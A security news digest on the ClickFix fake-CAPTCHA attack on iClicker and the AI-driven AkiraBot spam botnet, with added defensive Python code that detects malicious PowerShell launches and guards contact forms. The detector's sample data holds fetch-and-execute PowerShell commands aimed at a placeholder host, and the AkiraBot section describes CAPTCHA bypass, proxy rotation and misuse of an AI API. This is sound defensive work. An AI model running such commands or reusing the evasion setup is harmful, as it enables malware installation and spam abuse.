Lawrence Abrams@BleepingComputer
iClicker, a widely used student engagement platform, fell victim to a sophisticated ClickFix attack that compromised its website. The attack used a fake CAPTCHA prompt to trick both students and instructors into unknowingly installing malware on their devices. The incident illustrates the growing trend of cybercriminals exploiting user trust through social engineering. iClicker, a subsidiary of Macmillan, serves approximately 5,000 instructors and 7 million students across numerous universities in the United States, which makes it an attractive target for this kind of campaign. The company has acknowledged the hijacking and issued a security bulletin advising affected users to take immediate action.
The ClickFix attack hinges on users' familiarity with CAPTCHA verification. Instead of presenting a typical challenge to distinguish humans from bots, the fake CAPTCHA instructs the user to open the Windows Run dialog, paste a provided script, and press Enter. Unbeknownst to the user, this runs a PowerShell script that retrieves and installs malware, giving the attackers unauthorized access to the computer.

The University of Michigan's IT security team issued an early warning to students after discovering the malicious CAPTCHA. Sophos X-Ops identified the malware installed through this method as the notorious Lumma Stealer, a Malware-as-a-Service (MaaS) offering typically sold via Telegram channels that lets cybercriminals steal sensitive data, including browser passwords, cookies, cryptocurrency wallets, and session tokens.

iClicker advised users who interacted with the false CAPTCHA between April 12-16 to run antivirus software and change their passwords immediately. The attack demonstrates the need for heightened cybersecurity awareness and vigilance when interacting with online prompts, even on trusted websites.
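The chain described above (Run dialog, pasted command, PowerShell fetching a payload) leaves a recognisable trace in process-creation telemetry: a command started from the Run dialog runs under explorer.exe as its parent. The following detection script is an added example, not code from the article or from iClicker, Sophos or any vendor. It assumes simplified, constructed Sysmon Event ID 1 / EDR-style event fields (`parent_image`, `image`, `command_line`, `user`) and constructed sample command lines; the decoding of `-EncodedCommand` (base64 of UTF-16LE text) is standard PowerShell behaviour.

```python
"""Heuristic detection of ClickFix-style PowerShell launches in process-creation logs.

Added example, not from the article. Event fields are a simplified, constructed
Sysmon Event ID 1 / EDR style; command lines are constructed, not real indicators.
"""
import base64
import re

# A ClickFix page tells the victim to paste a command into the Run dialog (Win+R);
# a process started that way has explorer.exe as its parent. The encoded payload
# below is constructed for the sample events so the decoder path is exercised.
ENCODED_SAMPLE = base64.b64encode(
    "iwr http://example.invalid/a | iex".encode("utf-16-le")
).decode("ascii")

PS51 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed sample telemetry
    {"user": "student01", "parent_image": r"C:\Windows\explorer.exe", "image": PS51,
     "command_line": 'powershell -w hidden -c "iwr http://example.invalid/check.txt | iex"'},
    {"user": "student01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe homework.txt"},
    {"user": "helpdesk", "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS51,
     "command_line": r"powershell -File C:\scripts\inventory.ps1"},
    {"user": "instructor02", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "command_line": f"pwsh -NoProfile -EncodedCommand {ENCODED_SAMPLE}"},
    {"user": "student02", "parent_image": r"C:\Windows\explorer.exe", "image": PS51,
     "command_line": "powershell.exe"},  # user simply opened a console: benign
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}
INTERACTIVE_PARENTS = {"explorer.exe"}  # Run dialog / desktop shell launches

ENCODED_RE = re.compile(r"-e(c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{8,})", re.I)
INDICATORS = {  # fetch-and-execute / evasion idioms typical of pasted ClickFix commands
    "remote_fetch": re.compile(
        r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget)\b|https?://", re.I),
    "inline_exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_cmd": ENCODED_RE,
}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand carries UTF-16LE text as base64; decode it for inspection."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(2)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def matched_indicators(text: str):
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def analyze_event(event):
    """Return a finding dict for a suspicious interactive PowerShell launch, else None."""
    if basename(event["image"]) not in POWERSHELL_IMAGES:
        return None
    if basename(event["parent_image"]) not in INTERACTIVE_PARENTS:
        return None  # scripted/admin launches are out of scope for this rule
    reasons = ["interactive_parent"] + matched_indicators(event["command_line"])
    decoded = decode_encoded_command(event["command_line"])
    if decoded:
        reasons += ["decoded:" + n for n in matched_indicators(decoded)]
    if len(reasons) == 1:
        return None  # opening a console from the shell alone is normal behaviour
    return {"user": event["user"], "command_line": event["command_line"],
            "decoded_command": decoded, "reasons": reasons}


def find_clickfix_candidates(events):
    return [f for f in (analyze_event(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in find_clickfix_candidates(SAMPLE_EVENTS):
        print(finding["user"], finding["reasons"])
```

The rule deliberately keys on the interactive parent plus at least one content indicator, so an administrator running a signed script from cmd.exe, or a student merely opening a PowerShell window, is not flagged; pair it with the RunMRU registry history and the iClicker advice (antivirus scan, password change) when triaging a hit.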
Alex Delamotte@sentinelone.com
AkiraBot, an AI-powered botnet, has been identified as the source of a widespread spam campaign targeting over 80,000 websites since September 2024. The framework leverages OpenAI's API to generate custom outreach messages tailored to the content of each targeted website, promoting dubious SEO services. Unlike typical spam tools, AkiraBot employs CAPTCHA bypass mechanisms and network detection evasion techniques, which makes it a significant challenge for website defenders. It rotates attacker-controlled domain names and uses AI-generated content, so traditional spam filters struggle to identify and block the messages.
AkiraBot operates by targeting contact forms and chat widgets embedded on small to medium-sized business websites. The framework is modular and specifically designed to evade CAPTCHA filters and avoid network detections. To bypass CAPTCHAs, AkiraBot mimics legitimate user behavior and uses services such as Capsolver, FastCaptcha, and NextCaptcha. It also relies on proxy services like SmartProxy, typically used by advertisers, to rotate IP addresses and maintain geographic anonymity, defeating rate limiting and system-wide blocks.

The use of OpenAI's language models, specifically GPT-4o-mini, allows AkiraBot to create unique and personalized spam messages for each targeted site. By scraping site content, the bot generates messages that appear authentic, increasing engagement and evading traditional spam filters. While OpenAI has since revoked the spammers' account, the four months the activity went unnoticed highlight the reactive nature of enforcement and the emerging challenges AI poses to defending websites against spam. This approach marks a significant evolution in spam tactics, as the individualized nature of AI-generated content complicates detection and blocking.
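Because AkiraBot rotates proxy IPs and generates a unique message per site, per-IP rate limits and template-matching filters are the two defences it is built to defeat. The server-side contact-form guard below is an added example, not code from SentinelOne or any project named in the article. It assumes a constructed secret, a constructed honeypot field named `website_url_confirm`, a constructed prefix-to-ASN table standing in for a real ASN/GeoIP lookup, and constructed submissions; it combines a signed render-time token (dwell-time check), a honeypot, a content heuristic for promotional links, and rate limiting keyed by ASN rather than by single IP, so a pool of rotating proxy addresses in one network still trips the limit.

```python
"""Server-side contact-form abuse scoring that does not rely on per-IP limits.

Added example, not from the article. Secret, honeypot field name, ASN table and
submissions are all constructed for the demonstration.
"""
import hashlib
import hmac
import re
from collections import defaultdict

SECRET = b"constructed-server-secret"  # constructed; load from config in practice

# Constructed stand-in for a real ASN/GeoIP lookup: first two octets -> network label.
ASN_TABLE = {"203.0": "AS-PROXY-POOL", "198.51": "AS-RESIDENTIAL"}

PROMO_TERMS = re.compile(r"\b(seo|backlinks?|rank(ing)? on google|free audit)\b", re.I)
URL_RE = re.compile(r"https?://\S+", re.I)


def asn_of(ip: str) -> str:
    return ASN_TABLE.get(".".join(ip.split(".")[:2]), "AS-UNKNOWN")


def issue_form_token(issued_at: int) -> str:
    """Signed render timestamp embedded in the form; lets the server check dwell time statelessly."""
    sig = hmac.new(SECRET, str(issued_at).encode(), hashlib.sha256).hexdigest()[:16]
    return f"{issued_at}.{sig}"


def verify_form_token(token: str):
    try:
        ts, sig = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(SECRET, ts.encode(), hashlib.sha256).hexdigest()[:16]
    if not hmac.compare_digest(sig, expected):
        return None
    return int(ts)


class ContactFormGuard:
    def __init__(self, min_dwell_seconds=4, asn_limit=5, window_seconds=3600):
        self.min_dwell = min_dwell_seconds
        self.asn_limit = asn_limit
        self.window = window_seconds
        self.asn_hits = defaultdict(list)  # ASN label -> submission timestamps

    def evaluate(self, submission, now: int):
        """Return the list of abuse signals for one submission (empty list = looks human)."""
        reasons = []
        if submission.get("website_url_confirm"):  # honeypot: hidden by CSS, humans leave it empty
            reasons.append("honeypot_filled")
        issued = verify_form_token(submission.get("form_token", ""))
        if issued is None:
            reasons.append("bad_token")
        elif now - issued < self.min_dwell:
            reasons.append("submitted_too_fast")
        msg = submission["message"]
        if PROMO_TERMS.search(msg) and URL_RE.search(msg):
            reasons.append("promo_with_link")
        # Count per network, not per address: rotating proxies share an ASN.
        asn = asn_of(submission["ip"])
        recent = [t for t in self.asn_hits[asn] if now - t < self.window]
        recent.append(now)
        self.asn_hits[asn] = recent
        if len(recent) > self.asn_limit:
            reasons.append("asn_rate_limit")
        return reasons


def run_demo():
    """Constructed traffic: one human enquiry, then six bot posts from rotating proxy IPs."""
    guard = ContactFormGuard()
    now = 1_700_000_000
    human = {"ip": "198.51.100.7", "message": "Hi, is the lab open on Saturday?",
             "form_token": issue_form_token(now - 45), "website_url_confirm": ""}
    results = {"human": guard.evaluate(human, now)}
    bot_results = []
    for i in range(6):  # each post from a different IP in the same proxy network, 1 s dwell
        bot = {"ip": f"203.0.113.{10 + i}",
               "message": f"Page {i} looks great but ranks poorly; our SEO backlinks plan: "
                          "https://example.invalid/seo",
               "form_token": issue_form_token(now + i - 1), "website_url_confirm": ""}
        bot_results.append(guard.evaluate(bot, now + i))
    results["bot_first"] = bot_results[0]
    results["bot_last"] = bot_results[-1]
    return results


if __name__ == "__main__":
    for label, reasons in run_demo().items():
        print(label, reasons or "ok")
```

The bot posts are left with an empty honeypot on purpose, since the article notes AkiraBot mimics legitimate user behaviour; the first post is still caught by dwell time and content, and by the sixth post the ASN-level counter trips even though no single IP repeats.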